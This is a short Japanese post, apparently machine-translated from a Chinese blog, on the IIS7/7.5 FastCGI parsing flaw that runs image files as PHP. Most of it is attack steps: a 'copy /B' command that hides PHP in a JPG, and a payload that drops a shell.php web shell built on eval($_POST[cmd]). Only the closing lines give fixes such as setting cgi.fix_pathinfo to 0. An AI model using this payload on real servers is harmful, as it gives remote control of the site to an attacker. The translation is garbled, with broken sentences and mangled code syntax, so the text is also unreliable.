IIS7とIIS7.5の解析の脆弱性

/xx.php /xx.jpg/xx.php続くファイルパス(/xx.jpg)でIIS7 /動作の高速CGIモードで7.5、PHP用のファイルを解析します。

 

この方法で使用される:頭と尾のマップとテキストファイル書かれたバックドアコード書かれたテキストは、悪質なバイナリイメージをマージした後、画像ファイルの回避ダメージを

 

例えばコピーxx.jpg / B + yy.txt / xy.jpg

######################################

/ B即ちバイナリ[バイナリ]モード

アスキーxx.jpg通常の画像ファイルである/ Aモード

 

yy.txt内容<?PHPfputs(のfopen( 'shell.php'、) 'W'、 '?<?phpのevalの($ _ POST [CMD])>');?>

コンテンツを書くことを意味<?PHPのevalの($ _ POST [CMD])?>は、ファイルshell.phpの名前です

 

######################################

Xy.jpgは、悪意のないテキストを実行するためのアドレスプラス/xx.php後、アップロードした後、xy.jpgアドレスを見つけるための場所を見つけます。

そして、画像ディレクトリ内の単語トロイの木馬shell.phpパスワードcmdを生成

 

注意:

二つの条件を解決するためのニーズを活用します:

cgi.fix_pathinfo 1. php.iniの= 1(デフォルト1)

 

2.次のことを確認し、「ハンドラーマッピング」でキャンセル:

 

ソリューション:

1.設定cgi.pathinfo(php.iniの)0で、プログラムのphp-cgiのを再起動します

  

「ハンドラーマッピング」チェックのphp-cgi.exeがプログラム2.「呼び出しハンドラ要求がマップされている場合にのみ」

 

3.再設定は、使用ISAPIの道(:PHP5.3.1もはやサポートISAPIモードノート)、IIS。


オリジナルリンクします。https://blog.csdn.net/sap910131/article/details/37379177

おすすめ

転載: www.cnblogs.com/liang-chen/p/11839276.html